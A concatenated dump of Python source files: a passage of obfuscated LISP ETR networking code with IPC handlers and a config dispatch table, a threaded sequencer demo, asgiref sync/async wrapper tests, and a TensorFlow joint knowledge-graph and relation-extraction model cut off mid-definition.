if 49 - 49: ooOO00oOo + II111iiii / oooO0oo0oOOOO - O0 % o0000oOoOoO0o
if 27 - 27: ooOO00oOo + OoO0O00
if 92 - 92: oo % i1I1ii1II1iII
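# IPC handler for "rtr%" messages: records an RTR going up or down in
# lisp_rtr_list, apparently so registrations only include reachable RTRs when
# register-reachable-rtrs is configured (no-op when all RTRs are registered).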
def iiiI1IiI ( ipc ) :
if ( lisp . lisp_register_all_rtrs ) : return
if 2 - 2: O0 % o0oo0o % oOoO0oo0OOOo % Ooo00oOo00o - OoO0O00
i1i11ii1 , oO , oO0OOOO0o0 = ipc . split ( "%" )
if ( oO not in lisp . lisp_rtr_list ) : return
if 95 - 95: i11iIiiIii
lisp . lprint ( "Process ITR IPC message, RTR {} has gone {}" . format (
lisp . red ( oO , False ) , lisp . bold ( oO0OOOO0o0 , False ) ) )
if 95 - 95: OoO0O00
IIiIi = lisp . lisp_rtr_list [ oO ]
if ( oO0OOOO0o0 == "down" ) :
lisp . lisp_rtr_list [ oO ] = None
return
if 49 - 49: oo
if 24 - 24: II111iiii / o0000oOoOoO0o . iIii1I11I1II1 - II111iiii % O0
IIiIi = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , oO , 32 , 0 )
lisp . lisp_rtr_list [ oO ] = IIiIi
return
if 8 - 8: ooOO00oOo % i1I1ii1II1iII . OoooooooOO - o0000oOoOoO0o % OoooooooOO
if 61 - 61: Ooo00oOo00o / i11iIiiIii
if 28 - 28: II11iiII / oOo0O0Ooo
if 30 - 30: Oo
if 57 - 57: Ooo00oOo00o * i11iIiiIii / oOo0O0Ooo
if 40 - 40: iIii1I11I1II1 - Oo / OoO0O00
if 24 - 24: iiiiIi11i - i1I1ii1II1iII / Oo
if 10 - 10: oOo0O0Ooo * i1IIi
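# IPC handler for "nonce%" messages: parses the hex nonce and updates the
# echo-nonce state for the RLOC, either a request-nonce that was sent ("R")
# or an echoed nonce ("E").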
def I1Ii1ii ( ipc ) :
oOOOoo0o , i1i11ii1 , iIIi1 , OoOo0O00 = ipc . split ( "%" )
OoOo0O00 = int ( OoOo0O00 , 16 )
if 9 - 9: II11iiII
I1i = lisp . lisp_get_echo_nonce ( None , iIIi1 )
if ( I1i == None ) : I1i = lisp . lisp_echo_nonce ( iIIi1 )
if 44 - 44: ooOO00oOo . i1I1ii1II1iII / OoOO0ooOOoo0O + OoO0O00 - ooOO00oOo / II111iiii
if ( i1i11ii1 == "R" ) :
I1i . request_nonce_sent = OoOo0O00
lisp . lprint ( "Waiting for echo-nonce 0x{} from {}" . format ( lisp . lisp_hex_string ( OoOo0O00 ) , lisp . red ( I1i . rloc_str , False ) ) )
if 93 - 93: iiiiIi11i - II11iiII + Ooo00oOo00o . iiiiIi11i / OoOO0ooOOoo0O
elif ( i1i11ii1 == "E" ) :
I1i . echo_nonce_sent = OoOo0O00
lisp . lprint ( "Sent echo-nonce 0x{} to {}" . format ( lisp . lisp_hex_string ( OoOo0O00 ) , lisp . red ( I1i . rloc_str , False ) ) )
if 52 - 52: o0oo0o + o0oo0o
if 73 - 73: Ooo00oOo00o . i11iIiiIii % OoooooooOO + Oo . OoooooooOO / II11iiII
return
if 54 - 54: oOo0O0Ooo . OoooooooOO
if 36 - 36: iiiiIi11i / II111iiii * oooO0oo0oOOOO % oOoO0oo0OOOo
if 31 - 31: II111iiii + II11iiII - OoooooooOO . OoOO0ooOOoo0O
if 28 - 28: o0000oOoOoO0o . oOoO0oo0OOOo
if 77 - 77: oOoO0oo0OOOo % II111iiii
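# CLI/config dispatch table: maps "lisp ..." command clauses to their handler
# functions; per keyword, the leading boolean appears to indicate whether a
# value is required, followed by the allowed enumeration or numeric range.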
OOo00o0oo0 = {
"lisp xtr-parameters" : [ lispconfig . lisp_xtr_command , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-server" : [ ooO00OO0 , {
"ms-name" : [ True ] ,
"address" : [ True ] ,
"dns-name" : [ True ] ,
"authentication-type" : [ False , "sha1" , "sha2" ] ,
"authentication-key" : [ False ] ,
"encryption-key" : [ False ] ,
"proxy-reply" : [ False , "yes" , "no" ] ,
"want-map-notify" : [ False , "yes" , "no" ] ,
"merge-registrations" : [ False , "yes" , "no" ] ,
"refresh-registrations" : [ False , "yes" , "no" ] ,
"site-id" : [ False , 1 , 0xffffffffffffffff ] } ] ,
"lisp database-mapping" : [ OoooooOoo , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp geo-coordinates" : [ lispconfig . lisp_geo_command , {
"geo-name" : [ False ] ,
"geo-tag" : [ False ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp group-mapping" : [ oOooO , {
"group-name" : [ False ] ,
"ms-name" : [ True ] ,
"group-prefix" : [ False ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"rle-address" : [ False ] ,
"sources" : [ ] ,
"address" : [ True ] } ] ,
"show database-mapping" : [ oO00 , { } ] ,
"show etr-keys" : [ IIi1I11I1II , { } ] ,
"show etr-dynamic-eid" : [ lispconfig . lisp_show_dynamic_eid_command , { } ]
}
if 33 - 33: Ooo00oOo00o . II11iiII + Ooo00oOo00o / oOoO0oo0OOOo . OoO0O00 + oOo0O0Ooo
if 32 - 32: oooO0oo0oOOOO - Oo * i1I1ii1II1iII * OoOO0ooOOoo0O
if 84 - 84: o0000oOoOoO0o + oOoO0oo0OOOo % oo + i11iIiiIii
if 37 - 37: OoOO0ooOOoo0O % oOoO0oo0OOOo / Oo
if 94 - 94: OoOO0ooOOoo0O / ooOO00oOo . Ooo00oOo00o
if 1 - 1: OoO0O00 . II111iiii
if ( Ii1iIi ( ) == False ) :
lisp . lprint ( "lisp_etr_startup() failed" )
lisp . lisp_print_banner ( "ETR abnormal exit" )
exit ( 1 )
if 93 - 93: II111iiii . i11iIiiIii + II111iiii % iiiiIi11i
if 98 - 98: o0oo0o * iiiiIi11i * oOo0O0Ooo + o0000oOoOoO0o * i1I1ii1II1iII
ii11iI1iIiiI = [ i1111 , I11 ]
if 99 - 99: i11iIiiIii - i1I1ii1II1iII
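# Main event loop: select() on the data socket and the lisp-etr IPC socket;
# data-port packets go to the decap path, RLOC-probe requests are ignored
# (handled via pcap), and commands are routed to the handlers and dispatch
# table above or to lisp_parse_packet().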
while ( True ) :
try : o0O0O0O00o , OoOooOo00o , oOOOoo0o = select . select ( ii11iI1iIiiI , [ ] , [ ] )
except : break
if 28 - 28: oOoO0oo0OOOo + oOoO0oo0OOOo % oOo0O0Ooo
if 12 - 12: OoOO0ooOOoo0O
if 19 - 19: o0000oOoOoO0o * i1IIi % O0 + OoOO0ooOOoo0O
if 25 - 25: o0oo0o - o0000oOoOoO0o / O0 . OoooooooOO % oo . i1IIi
if ( i1111 in o0O0O0O00o ) :
i1i11ii1 , i1OOO0000oO , O0OOOOo0 , oOO0 = lisp . lisp_receive ( i1111 , False )
if 19 - 19: II111iiii / II111iiii % oOoO0oo0OOOo + iiiiIi11i + iiiiIi11i + i1I1ii1II1iII
if ( i1OOO0000oO == "" ) : break
if 4 - 4: Ooo00oOo00o + OoOO0ooOOoo0O / i1I1ii1II1iII + i1IIi % Ooo00oOo00o % i1I1ii1II1iII
if ( O0OOOOo0 == lisp . LISP_DATA_PORT ) :
oOoO ( oOo0oooo00o , oOO0 , i1OOO0000oO )
else :
if ( lisp . lisp_is_rloc_probe_request ( oOO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 80 - 80: o0000oOoOoO0o
iioOO = lisp . lisp_parse_packet ( Oo0o0000o0o0 , oOO0 ,
i1OOO0000oO , O0OOOOo0 )
if 38 - 38: OoOO0ooOOoo0O . oooO0oo0oOOOO - ooOO00oOo . oo
if 65 - 65: o0oo0o
if 31 - 31: i11iIiiIii / oOo0O0Ooo % oOoO0oo0OOOo
if 44 - 44: II111iiii * oo + II11iiII
if 31 - 31: o0000oOoOoO0o * Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo * Ooo00oOo00o . o0oo0o
if ( iioOO ) :
oOOoo00O0O = threading . Timer ( 0 ,
iIIIiIi , [ None ] )
oOOoo00O0O . start ( )
o0oOoO00o = threading . Timer ( 0 ,
ooO0o0Oo , [ Oo0o0000o0o0 ] )
o0oOoO00o . start ( )
if 89 - 89: OoooooooOO * o0000oOoOoO0o * oo . Oo * o0000oOoOoO0o / i1I1ii1II1iII
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . i1I1ii1II1iII % oOo0O0Ooo + oo
if 48 - 48: o0oo0o % i1I1ii1II1iII % o0000oOoOoO0o % iIii1I11I1II1 . o0000oOoOoO0o
if 14 - 14: i1I1ii1II1iII * ooOO00oOo % O0 + OoOO0ooOOoo0O + oOoO0oo0OOOo
if 23 - 23: OoO0O00 % i1I1ii1II1iII + o0000oOoOoO0o - o0oo0o
if 65 - 65: OoooooooOO
if 22 - 22: II11iiII + II111iiii + OoO0O00
if ( I11 in o0O0O0O00o ) :
i1i11ii1 , i1OOO0000oO , O0OOOOo0 , oOO0 = lisp . lisp_receive ( I11 , True )
if 83 - 83: Oo
if ( i1OOO0000oO == "" ) : break
if 43 - 43: II11iiII
if ( i1i11ii1 == "command" ) :
if ( oOO0 . find ( "learn%" ) != - 1 ) :
Oo00OOoO0oo ( oOO0 )
elif ( oOO0 . find ( "nonce%" ) != - 1 ) :
I1Ii1ii ( oOO0 )
elif ( oOO0 . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( oOO0 )
elif ( oOO0 . find ( "rtr%" ) != - 1 ) :
iiiI1IiI ( oOO0 )
elif ( oOO0 . find ( "stats%" ) != - 1 ) :
oOO0 = oOO0 . split ( "%" ) [ - 1 ]
lisp . lisp_process_data_plane_decap_stats ( oOO0 , None )
else :
lispconfig . lisp_process_command ( I11 ,
i1i11ii1 , oOO0 , "lisp-etr" , [ OOo00o0oo0 ] )
if 84 - 84: II11iiII . oooO0oo0oOOOO . i1I1ii1II1iII
elif ( i1i11ii1 == "api" ) :
lisp . lisp_process_api ( "lisp-etr" , I11 , oOO0 )
else :
if ( lisp . lisp_is_rloc_probe_request ( oOO0 [ 0 ] ) ) :
lisp . lprint ( "ETR ignoring RLOC-probe request, using pcap" )
continue
if 2 - 2: OoO0O00 - oOo0O0Ooo
lisp . lisp_parse_packet ( Oo0o0000o0o0 , oOO0 , i1OOO0000oO , O0OOOOo0 )
if 49 - 49: o0000oOoOoO0o + II111iiii / iiiiIi11i - oOo0O0Ooo % oOo0O0Ooo + oo
if 54 - 54: Oo % OoO0O00 - II11iiII
if 16 - 16: oOoO0oo0OOOo * i1I1ii1II1iII / OoOO0ooOOoo0O
if 46 - 46: II111iiii
O0oO0 ( )
lisp . lisp_print_banner ( "ETR normal exit" )
exit ( 0 )
if 13 - 13: oooO0oo0oOOOO + II111iiii % oo
if 30 - 30: OoooooooOO - i11iIiiIii + iiiiIi11i / OoO0O00 - i11iIiiIii
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
main_thread.py
|
import os
import colorama
import multiprocessing
from dotenv import load_dotenv
from threading import Thread, current_thread
from model.sequencer import Sequencer
from utils.db_connection_db import DatabaseConnection
from utils.db_connection_mock import DatabaseConnectionMock
load_dotenv()
def show_id(seq: Sequencer):
current_process = multiprocessing.current_process()
thread_id = current_thread().ident
current_id = seq.get_id_safe()
print(colorama.Fore.YELLOW + f'Process Id: {current_process.pid} - '
f'Thread Id: {thread_id} - '
f'Sequencer Id: {current_id}', flush=True)
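# main() appears to read DB settings from the environment, build a shared
# Sequencer, and spawn six daemon threads that each print their process id,
# thread id, and the id returned by Sequencer.get_id_safe().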
def main():
db_driver = os.environ["DB_DRIVER"]
db_name = os.environ["DB_NAME"]
db_user = os.environ["DB_USER"]
db_password = os.environ["DB_PASSWORD"]
db_host = os.environ["DB_HOST"]
db_port = os.environ["DB_PORT"]
db_conn = DatabaseConnection(db_driver, db_user, db_password, db_host, db_port, db_name)
#db_conn = DatabaseConnectionMock()
sequencer = Sequencer(db_conn)
jobs = []
print()
for _ in range(6):
jobs.append(Thread(target=show_id, args=(sequencer,), daemon=True))
[j.start() for j in jobs]
[j.join() for j in jobs]
print()
if __name__ == '__main__':
main()
|
test_sync.py
|
import asyncio
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
from unittest import TestCase
import pytest
from asgiref.sync import async_to_sync, sync_to_async
@pytest.mark.asyncio
async def test_sync_to_async():
"""
Tests we can call sync functions from an async thread
(even if the number of thread workers is less than the number of calls)
"""
# Define sync function
def sync_function():
time.sleep(1)
return 42
# Ensure outermost detection works
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
start = time.monotonic()
result = await async_function()
end = time.monotonic()
assert result == 42
assert end - start >= 1
# Set workers to 1, call it twice and make sure that works right
loop = asyncio.get_event_loop()
old_executor = loop._default_executor
loop.set_default_executor(ThreadPoolExecutor(max_workers=1))
try:
start = time.monotonic()
await asyncio.wait([async_function(), async_function()])
end = time.monotonic()
# It should take at least 2 seconds as there's only one worker.
assert end - start >= 2
finally:
loop.set_default_executor(old_executor)
@pytest.mark.asyncio
async def test_sync_to_async_decorator():
"""
Tests sync_to_async as a decorator
"""
# Define sync function
@sync_to_async
def test_function():
time.sleep(1)
return 43
# Check it works right
result = await test_function()
assert result == 43
@pytest.mark.asyncio
async def test_nested_sync_to_async_retains_wrapped_function_attributes():
"""
Tests that attributes of functions wrapped by sync_to_async are retained
"""
def enclosing_decorator(attr_value):
@wraps(attr_value)
def wrapper(f):
f.attr_name = attr_value
return f
return wrapper
@enclosing_decorator("test_name_attribute")
@sync_to_async
def test_function():
pass
assert test_function.attr_name == "test_name_attribute"
assert test_function.__name__ == "test_function"
@pytest.mark.asyncio
async def test_sync_to_async_method_decorator():
"""
Tests sync_to_async as a method decorator
"""
# Define sync function
class TestClass:
@sync_to_async
def test_method(self):
time.sleep(1)
return 44
# Check it works right
instance = TestClass()
result = await instance.test_method()
assert result == 44
@pytest.mark.asyncio
async def test_sync_to_async_method_self_attribute():
"""
Tests sync_to_async on a method copies __self__
"""
# Define sync function
class TestClass:
def test_method(self):
time.sleep(0.1)
return 45
# Check it works right
instance = TestClass()
method = sync_to_async(instance.test_method)
result = await method()
assert result == 45
# Check __self__ has been copied
assert method.__self__ == instance
@pytest.mark.asyncio
async def test_async_to_sync_to_async():
"""
Tests we can call async functions from a sync thread created by async_to_sync
(even if the number of thread workers is less than the number of calls)
"""
result = {}
# Define async function
async def inner_async_function():
result["worked"] = True
result["thread"] = threading.current_thread()
return 65
# Define sync function
def sync_function():
return async_to_sync(inner_async_function)()
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
number = await async_function()
assert number == 65
assert result["worked"]
# Make sure that it didn't needlessly make a new async loop
assert result["thread"] == threading.current_thread()
def test_async_to_sync():
"""
Tests we can call async_to_sync outside of an outer event loop.
"""
result = {}
# Define async function
async def inner_async_function():
await asyncio.sleep(0)
result["worked"] = True
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
number = sync_function()
assert number == 84
assert result["worked"]
def test_async_to_sync_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
return 85
# Run it
number = test_function()
assert number == 85
assert result["worked"]
def test_async_to_sync_method_decorator():
"""
Tests we can call async_to_sync as a method decorator
"""
result = {}
# Define async function
class TestClass:
@async_to_sync
async def test_function(self):
await asyncio.sleep(0)
result["worked"] = True
return 86
# Run it
instance = TestClass()
number = instance.test_function()
assert number == 86
assert result["worked"]
@pytest.mark.asyncio
async def test_async_to_sync_in_async():
"""
Makes sure async_to_sync bails if you try to call it from an async loop
"""
# Define async function
async def inner_async_function():
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
with pytest.raises(RuntimeError):
sync_function()
def test_async_to_sync_in_thread():
"""
Tests we can call async_to_sync inside a thread
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
# Make a thread and run it
thread = threading.Thread(target=test_function)
thread.start()
thread.join()
assert result["worked"]
def test_thread_sensitive_outside_sync():
"""
Tests that thread_sensitive SyncToAsync where the outside is sync code runs
in the main thread.
"""
result = {}
# Middle async function
@async_to_sync
async def middle():
await inner()
# Inner sync function
def inner():
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it
middle()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_outside_async():
"""
Tests that thread_sensitive SyncToAsync where the outside is async code runs
in a single, separate thread.
"""
result_1 = {}
result_2 = {}
# Outer sync function
def outer(result):
middle(result)
outer = sync_to_async(outer, thread_sensitive=True)
# Middle async function
@async_to_sync
async def middle(result):
await inner(result)
# Inner sync function
def inner(result):
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it (in supposed parallel!)
await asyncio.wait([outer(result_1), inner(result_2)])
# They should not have run in the main thread, but in the same thread
assert result_1["thread"] != threading.current_thread()
assert result_1["thread"] == result_2["thread"]
def test_thread_sensitive_double_nested_sync():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is sync.
"""
result = {}
# Async level 1
@async_to_sync
async def level1():
await level2()
# Sync level 2
def level2():
level3()
level2 = sync_to_async(level2, thread_sensitive=True)
# Async level 3
@async_to_sync
async def level3():
await level4()
# Sync level 4
def level4():
result["thread"] = threading.current_thread()
level4 = sync_to_async(level4, thread_sensitive=True)
# Run it
level1()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_double_nested_async():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is async.
"""
result = {}
# Sync level 1
def level1():
level2()
level1 = sync_to_async(level1, thread_sensitive=True)
# Async level 2
@async_to_sync
async def level2():
await level3()
# Sync level 3
def level3():
level4()
level3 = sync_to_async(level3, thread_sensitive=True)
# Async level 4
@async_to_sync
async def level4():
result["thread"] = threading.current_thread()
# Run it
await level1()
assert result["thread"] == threading.current_thread()
class ASGITest(TestCase):
"""
Tests collection of async cases inside classes
"""
@async_to_sync
async def test_wrapped_case_is_collected(self):
self.assertTrue(True)
def test_sync_to_async_detected_as_coroutinefunction():
"""
Tests that SyncToAsync functions are detected as coroutines.
"""
def sync_func():
return
assert not asyncio.iscoroutinefunction(sync_to_async)
assert asyncio.iscoroutinefunction(sync_to_async(sync_func))
|
JointD+ATT.py
|
#coding:utf-8
import numpy as np
import tensorflow as tf
import os
import time
import datetime
import ctypes
import threading
import json
ll1 = ctypes.cdll.LoadLibrary
lib_cnn = ll1("./init_cnn.so")
ll2 = ctypes.cdll.LoadLibrary
lib_kg = ll2("./init_know.so")
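# The two shared libraries appear to supply C-side batching: init_cnn.so for
# the sentence/CNN side and init_know.so for the knowledge-graph triples;
# batches are exchanged by passing raw numpy buffer addresses through ctypes.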
class Config(object):
def __init__(self):
self.instanceTot = lib_cnn.getInstanceTot()
self.sequence_size = lib_cnn.getLenLimit()
self.num_classes = lib_cnn.getRelationTotal()
self.num_words = lib_cnn.getWordTotal()
self.num_positions = 2 * lib_cnn.getPositionLimit() + 1
self.word_size = lib_cnn.getWordDimension()
self.position_size = 5
self.embedding_size = self.word_size + self.position_size * 2
self.filter_size = 3
self.num_filters = 230
self.relation_size = self.word_size
self.dropout_keep_prob = 0.5
self.l2_lambda = 0.0001
self.NA = 51
lib_cnn.setNA(self.NA)
lib_cnn.setRate(3)
self.margin = 1.0
self.nbatches = 100
self.trainTimes = 15
self.entityTotal = 0
self.relationTotal = 0
class Model(object):
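# calc() appears to be a TransD-style projection: it maps an embedding e into
# the relation space as e + (e . t) * r, where t and r are the entity and
# relation transfer vectors (keep_dims keeps the row shape for broadcasting).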
def calc(self, e, t, r):
return e + tf.reduce_sum(e * t, 1, keep_dims = True) * r
def __init__(self, config):
sequence_size = config.sequence_size
num_classes = config.num_classes
num_words = config.num_words
num_positions = config.num_positions
embedding_size = config.embedding_size
word_size = config.word_size
position_size = config.position_size
relation_size = config.relation_size
filter_size = config.filter_size
num_filters = config.num_filters
dropout_keep_prob = config.dropout_keep_prob
margin = config.margin
l2_lambda = config.l2_lambda
self.input_x = tf.placeholder(tf.int32, [None, sequence_size], name = "input_x")
self.input_p_h = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_h")
self.input_p_t = tf.placeholder(tf.int32, [None, sequence_size], name = "input_p_t")
self.input_r = tf.placeholder(tf.int32, [1, 1], name = "input_r")
self.input_r_n = tf.placeholder(tf.float32, [1, 1], name = "input_r_n")
self.input_h = tf.placeholder(tf.int32, [1, 1], name = "input_h")
self.input_t = tf.placeholder(tf.int32, [1, 1], name = "input_t")
self.input_y = tf.placeholder(tf.float32, [1, num_classes], name = "input_y")
self.pos_h = tf.placeholder(tf.int32, [None])
self.pos_t = tf.placeholder(tf.int32, [None])
self.pos_r = tf.placeholder(tf.int32, [None])
self.neg_h = tf.placeholder(tf.int32, [None])
self.neg_t = tf.placeholder(tf.int32, [None])
self.neg_r = tf.placeholder(tf.int32, [None])
l2_loss = tf.constant(0.0)
with tf.name_scope("embedding-lookup"):
self.word_embeddings = tf.Variable(word_embeddings, name="word_embeddings")
self.relation_embeddings = tf.get_variable("relation_embeddings", [config.relationTotal, word_size])
self.position_embeddings = tf.get_variable("position_embeddings", [num_positions, position_size])
self.relation_attention = tf.get_variable("relation_attention", [num_classes, relation_size])
self.NAattention = tf.get_variable("NAattention", [relation_size, 1])
self.attention = tf.get_variable("attention", [num_filters, relation_size])
self.ent_transfer = tf.get_variable("ent_transfer", shape = [len(word_embeddings), word_size])
self.rel_transfer = tf.get_variable("rel_transfer", shape = [config.relationTotal, word_size])
self.r = tf.nn.embedding_lookup(self.attention, self.input_r)
#know
pos_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_h)
pos_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.pos_t)
pos_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.pos_r)
pos_h_t = tf.nn.embedding_lookup(self.ent_transfer, self.pos_h)
pos_t_t = tf.nn.embedding_lookup(self.ent_transfer, self.pos_t)
pos_r_t = tf.nn.embedding_lookup(self.rel_transfer, self.pos_r)
neg_h_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_h)
neg_t_e = tf.nn.embedding_lookup(self.word_embeddings, self.neg_t)
neg_r_e = tf.nn.embedding_lookup(self.relation_embeddings, self.neg_r)
neg_h_t = tf.nn.embedding_lookup(self.ent_transfer, self.neg_h)
neg_t_t = tf.nn.embedding_lookup(self.ent_transfer, self.neg_t)
neg_r_t = tf.nn.embedding_lookup(self.rel_transfer, self.neg_r)
pos_h_e = self.calc(pos_h_e, pos_h_t, pos_r_t)
pos_t_e = self.calc(pos_t_e, pos_t_t, pos_r_t)
neg_h_e = self.calc(neg_h_e, neg_h_t, neg_r_t)
neg_t_e = self.calc(neg_t_e, neg_t_t, neg_r_t)
#cnn
self.x_initial = tf.nn.embedding_lookup(self.word_embeddings, self.input_x)
self.x_p_h = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_h)
self.x_p_t = tf.nn.embedding_lookup(self.position_embeddings, self.input_p_t)
self.x = tf.expand_dims(tf.concat(2, [self.x_initial, self.x_p_h, self.x_p_t]), -1)
self.head = tf.nn.embedding_lookup(self.word_embeddings, self.input_h)
self.tail = tf.nn.embedding_lookup(self.word_embeddings, self.input_t)
self.head_t = tf.nn.embedding_lookup(self.ent_transfer, self.input_h)
self.tail_t = tf.nn.embedding_lookup(self.ent_transfer, self.input_t)
self.r_t = tf.nn.embedding_lookup(self.rel_transfer, self.input_r)
self.head = self.calc(self.head, self.head_t, self.r_t)
self.tail = self.calc(self.tail, self.tail_t, self.r_t)
l2_loss += tf.nn.l2_loss(self.attention)
with tf.name_scope("conv-maxpool"):
self.W = tf.get_variable("W", [filter_size, embedding_size, 1, num_filters])
self.b = tf.get_variable("b", [num_filters])
conv = tf.nn.conv2d(self.x, self.W, strides=[1, 1, 1, 1], padding="VALID", name="conv")
h = tf.nn.tanh(tf.nn.bias_add(conv, self.b), name="tanh")
self.y = tf.nn.max_pool(h, ksize=[1, sequence_size - filter_size + 1, 1, 1], strides=[1, 1, 1, 1], padding='VALID', name="pool")
l2_loss += tf.nn.l2_loss(self.W)
l2_loss += tf.nn.l2_loss(self.b)
self.y = tf.reshape(self.y, [-1, num_filters])
with tf.name_scope('attention'):
self.r = tf.reshape(self.r, [relation_size, -1])
self.e = tf.matmul(tf.matmul(self.y, self.attention), self.r)
alpha = tf.reshape(self.e, [1, -1])
self.alpha_reshape = tf.nn.softmax(alpha)
self.y_attention = tf.matmul(self.alpha_reshape, self.y)
with tf.name_scope("dropout"):
self.y_attention = tf.nn.l2_normalize(self.y_attention, 1)
self.h_drop = tf.nn.dropout(self.y_attention, dropout_keep_prob)
self.transfer_w = tf.get_variable("transfer_w", [num_filters, num_classes])
self.scores = tf.matmul(self.h_drop, self.transfer_w)
l2_loss += tf.nn.l2_loss(self.transfer_w)
with tf.name_scope("loss"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.scores, self.input_y)
self.loss_cnn = tf.reduce_mean(cross_entropy) + l2_lambda * l2_loss
self.pos = tf.reduce_sum(abs(pos_h_e + pos_r_e - pos_t_e), 1, keep_dims = True)
self.neg = tf.reduce_sum(abs(neg_h_e + neg_r_e - neg_t_e), 1, keep_dims = True)
self.loss_kg = tf.reduce_sum(tf.maximum(self.pos - self.neg + margin, 0))
with tf.name_scope("accuracy"):
self.predictions = tf.argmax(self.scores, 1, name="predictions")
correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))
self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
bags_sum = 0.0
bags_hit_NA = 0.0
sum_NA = 0.0
sum_fNA = 0.0
bags_hit = 0.0
loss_sum = 0.0
if __name__ == "__main__":
lib_cnn.readWordVec()
lib_cnn.readFromFile()
lib_kg.init()
np.random.seed(0)
tf.set_random_seed(0)
config = Config()
word_embeddings = np.zeros(config.num_words * config.word_size, dtype = np.float32)
lib_cnn.getWordVec.argtypes = [ctypes.c_void_p]
lib_cnn.getWordVec(word_embeddings.__array_interface__['data'][0])
word_embeddings.resize((config.num_words,config.word_size))
config.batch_size = lib_kg.getTripleTotal() // config.nbatches
config.entityTotal = lib_kg.getEntityTotal()
config.relationTotal = lib_kg.getRelationTotal()
with tf.Graph().as_default():
conf = tf.ConfigProto()
sess = tf.Session(config=conf)
with sess.as_default():
initializer = tf.contrib.layers.xavier_initializer()
with tf.variable_scope("model", reuse=None, initializer = initializer):
m = Model(config = config)
global_step_cnn = tf.Variable(0, name="global_step_cnn", trainable=False)
optimizer_cnn = tf.train.GradientDescentOptimizer(0.01)
grads_and_vars_cnn = optimizer_cnn.compute_gradients(m.loss_cnn)
train_op_cnn = optimizer_cnn.apply_gradients(grads_and_vars_cnn, global_step = global_step_cnn)
global_step_kg = tf.Variable(0, name="global_step_kg", trainable=False)
optimizer_kg = tf.train.GradientDescentOptimizer(0.001)
grads_and_vars_kg = optimizer_kg.compute_gradients(m.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step=global_step_kg)
sess.run(tf.initialize_all_variables())
def outEmbedding(str1):
